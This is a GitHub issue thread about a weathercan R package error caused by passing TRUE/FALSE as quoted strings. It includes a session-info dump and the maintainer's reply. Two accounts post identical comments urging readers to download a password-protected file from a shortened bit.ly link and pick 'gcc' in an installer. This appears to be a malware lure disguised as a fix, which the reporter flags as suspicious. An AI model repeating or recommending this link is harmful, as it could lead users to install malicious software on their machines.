### ISSUE TITLE
Abnormal termination

### ISSUE THREAD

**Issue by busmansholiday** [ropensci/weathercan#142]
## Expected Behavior

Function call should end without an error
## Current Behavior

Function call ends with:

test_weather <-weather_dl( +   station_ids = unique(station_subset$station_id)[1:3],  +   time_disp = "UTC", +   start = "2020-01-01",  +   end = "2024-08-15", +   interval="day", +   format='FALSE', +   verbose='TRUE' + ) Getting station: 50308 Adding header data: 50308 Getting station: 54238 Adding header data: 54238 Getting station: 52978 Adding header data: 52978 Error in format && nrow(w) > 0 : invalid 'x' type in 'x && y'
--
 
> | >
>

</body>
</html>
## Steps to Reproduce (for bugs)

1. See fragment above
2.
3.
4.

## Your Environment

Successfully installed 31 packages in 6.2 seconds.
> devtools::session_info()
- Session info -------------------------------
 setting  value
 version  R version 4.2.2 (2022-10-31 ucrt)
 os       Windows Server x64 (build 17763)
 system   x86_64, mingw32
 ui       RStudio
 language (EN)
 collate  English_Canada.1252
 ctype    English_Canada.1252
 tz       America/Los_Angeles
 date     2024-08-27
 rstudio  2024.04.2+764 Chocolate Cosmos (desktop)
 pandoc   2.18 @ C:\\PROGRA~3\\CHOCOL~1\\bin\\pandoc.exe

- Packages -----------------------------------
 ! package     * version  date (UTC) lib source
 P arrow       * 17.0.0.1 2024-08-21 [?] CRAN (R 4.2.2)
 P assertthat    0.2.1    2019-03-21 [?] CRAN (R 4.2.2)
 P AzureAuth     1.3.3    2021-09-13 [?] CRAN (R 4.2.2)
 P AzureGraph    1.3.4    2023-09-06 [?] RSPM (R 4.2.0)
 P AzureRMR      2.4.4    2023-09-21 [?] RSPM (R 4.2.0)
 P AzureStor   * 3.7.0    2022-05-25 [?] CRAN (R 4.2.2)
   bit           4.0.5    2022-11-15 [1] CRAN (R 4.2.3)
   bit64         4.0.5    2020-08-30 [1] CRAN (R 4.2.3)
   cachem        1.1.0    2024-05-16 [1] CRAN (R 4.2.2)
 P cellranger    1.1.0    2016-07-27 [?] CRAN (R 4.2.2)
 P class         7.3-20   2022-01-16 [?] CRAN (R 4.2.2)
 P classInt      0.4-10   2023-09-05 [?] RSPM (R 4.2.0)
   cli           3.6.3    2024-06-21 [1] CRAN (R 4.2.2)
 P colorspace    2.1-1    2024-07-26 [?] RSPM (R 4.2.0)
   crayon        1.5.3    2024-06-20 [1] CRAN (R 4.2.2)
 P crosstalk     1.2.1    2023-11-23 [?] RSPM (R 4.2.0)
   curl          5.2.1    2024-03-01 [1] CRAN (R 4.2.3)
 P DBI           1.2.3    2024-06-02 [?] CRAN (R 4.2.2)
 P devtools      2.4.5    2022-10-11 [?] CRAN (R 4.2.2)
 P digest        0.6.37   2024-08-19 [?] CRAN (R 4.2.2)
   dplyr       * 1.1.4    2023-11-17 [1] CRAN (R 4.2.3)
 P e1071         1.7-14   2023-12-06 [?] CRAN (R 4.2.3)
 P echarts4r   * 0.4.5    2023-06-16 [?] CRAN (R 4.2.3)
 P ellipsis      0.3.2    2021-04-29 [?] CRAN (R 4.2.2)
   fansi         1.0.6    2023-12-08 [1] CRAN (R 4.2.3)
   fastmap       1.2.0    2024-05-15 [1] CRAN (R 4.2.2)
 P forcats     * 1.0.0    2023-01-29 [?] CRAN (R 4.2.2)
 P fs          * 1.6.4    2024-04-25 [?] RSPM (R 4.2.0)
   generics      0.1.3    2022-07-05 [1] CRAN (R 4.2.3)
 P ggplot2     * 3.5.1    2024-04-23 [?] CRAN (R 4.2.2)
   glue          1.7.0    2024-01-09 [1] CRAN (R 4.2.3)
 P gtable        0.3.5    2024-04-22 [?] CRAN (R 4.2.2)
 P here        * 1.0.1    2020-12-13 [?] CRAN (R 4.2.2)
   hms           1.1.3    2023-03-21 [1] CRAN (R 4.2.3)
 P htmltools     0.5.8.1  2024-04-04 [?] CRAN (R 4.2.3)
 P htmlwidgets   1.6.4    2023-12-06 [?] RSPM (R 4.2.0)
 P httpuv        1.6.15   2024-03-26 [?] CRAN (R 4.2.2)
   httr          1.4.7    2023-08-15 [1] CRAN (R 4.2.3)
 P janitor     * 2.2.0    2023-02-02 [?] CRAN (R 4.2.2)
 P jquerylib     0.1.4    2021-04-26 [?] CRAN (R 4.2.2)
   jsonlite      1.8.8    2023-12-04 [1] CRAN (R 4.2.3)
 P KernSmooth    2.23-20  2021-05-03 [?] CRAN (R 4.2.2)
 P later         1.3.2    2023-12-06 [?] RSPM (R 4.2.0)
 P leaflet     * 2.2.2    2024-03-26 [?] RSPM (R 4.2.0)
   lifecycle     1.0.4    2023-11-07 [1] CRAN (R 4.2.3)
   lubridate   * 1.9.3    2023-09-27 [1] CRAN (R 4.2.3)
 P lutz          0.3.2    2023-10-17 [?] RSPM (R 4.2.0)
   magrittr      2.0.3    2022-03-30 [1] CRAN (R 4.2.3)
   memoise       2.0.1    2021-11-26 [1] CRAN (R 4.2.3)
   mime          0.12     2021-09-28 [1] CRAN (R 4.2.0)
 P miniUI        0.1.1.1  2018-05-18 [?] CRAN (R 4.2.2)
 P munsell       0.5.1    2024-04-01 [?] CRAN (R 4.2.3)
   pillar        1.9.0    2023-03-22 [1] CRAN (R 4.2.3)
 P pkgbuild      1.4.4    2024-03-17 [?] CRAN (R 4.2.3)
   pkgconfig     2.0.3    2019-09-22 [1] CRAN (R 4.2.3)
 P pkgload       1.4.0    2024-06-28 [?] CRAN (R 4.2.2)
 P profvis       0.3.8    2023-05-02 [?] RSPM (R 4.2.0)
 P promises      1.3.0    2024-04-05 [?] RSPM (R 4.2.0)
 P proxy         0.4-27   2022-06-09 [?] CRAN (R 4.2.3)
   purrr       * 1.0.2    2023-08-10 [1] CRAN (R 4.2.3)
   R6            2.5.1    2021-08-19 [1] CRAN (R 4.2.3)
   rappdirs      0.3.3    2021-01-31 [1] CRAN (R 4.2.3)
 P Rcpp          1.0.13   2024-07-17 [?] RSPM
   readr       * 2.1.5    2024-01-10 [1] CRAN (R 4.2.3)
 P readxl      * 1.4.3    2023-07-06 [?] CRAN (R 4.2.3)
 P remotes       2.5.0    2024-03-17 [?] RSPM (R 4.2.0)
   renv          1.0.0    2023-07-07 [1] CRAN (R 4.2.3)
   rlang         1.1.4    2024-06-04 [1] CRAN (R 4.2.2)
 P rprojroot     2.0.4    2023-11-05 [?] RSPM (R 4.2.0)
 P rstudioapi    0.16.0   2024-03-24 [?] CRAN (R 4.2.2)
 P s2            1.1.7    2024-07-17 [?] RSPM (R 4.2.0)
 P scales        1.3.0    2023-11-28 [?] RSPM (R 4.2.0)
 P sessioninfo   1.2.2    2021-12-06 [?] CRAN (R 4.2.2)
 P sf            1.0-16   2024-03-24 [?] RSPM (R 4.2.0)
 P shiny         1.9.1    2024-08-01 [?] RSPM (R 4.2.0)
 P snakecase     0.11.1   2023-08-27 [?] CRAN (R 4.2.3)
   stringi       1.8.4    2024-05-06 [1] CRAN (R 4.2.2)
   stringr     * 1.5.1    2023-11-14 [1] CRAN (R 4.2.3)
   tibble      * 3.2.1    2023-03-20 [1] CRAN (R 4.2.3)
   tidyr       * 1.3.1    2024-01-24 [1] CRAN (R 4.2.3)
   tidyselect    1.2.1    2024-03-11 [1] CRAN (R 4.2.3)
 P tidyverse   * 2.0.0    2023-02-22 [?] CRAN (R 4.2.2)
   timechange    0.3.0    2024-01-18 [1] CRAN (R 4.2.3)
   tzdb          0.4.0    2023-05-12 [1] CRAN (R 4.2.3)
 P units         0.8-5    2023-11-28 [?] RSPM (R 4.2.0)
 P urlchecker    1.0.1    2021-11-30 [?] CRAN (R 4.2.2)
 P usethis       3.0.0    2024-07-29 [?] RSPM (R 4.2.0)
   utf8          1.2.4    2023-10-22 [1] CRAN (R 4.2.3)
   vctrs         0.6.5    2023-12-01 [1] CRAN (R 4.2.3)
   vroom         1.6.5    2023-12-05 [1] CRAN (R 4.2.3)
   weathercan  * 0.7.1    2024-08-23 [1] https://ropensci.r-universe.dev (R 4.2.2)
   withr         3.0.1    2024-07-31 [1] CRAN (R 4.2.2)
 P wk            0.9.2    2024-07-09 [?] RSPM (R 4.2.0)
 P xtable        1.8-4    2019-04-21 [?] CRAN (R 4.2.2)

 [1] C:/Users/rjames/Documents/R_Projects/canweather/renv/library/R-4.2/x86_64-w64-mingw32
 [2] C:/Users/rjames/AppData/Local/R/cache/R/renv/sandbox/R-4.2/x86_64-w64-mingw32/30182023

 P -- Loaded and on-disk path mismatch.

----------------------------------------------
>

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by busmansholiday** [comment]
NOTE: YeGop0218 has no followers and no contributions to any repo.  I recommend against following this posting without some legitimation.

**Comment by YeGop0218** [comment]
> NOTE: YeGop0218 has no followers and no contributions to any repo. I recommend against following this posting without some legitimation.

My account was logged in by a guy in Chicago. It's a viral link

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by busmansholiday** [comment]
User error. verbose is a TRUE FALSE/ not a string. Remove quote marks around TRUE and FALSE values.

**Comment by steffilazerte** [comment]
Good catch @busmansholiday, I'll make a note to catch invalid verbose arguments. Glad it worked out for you.
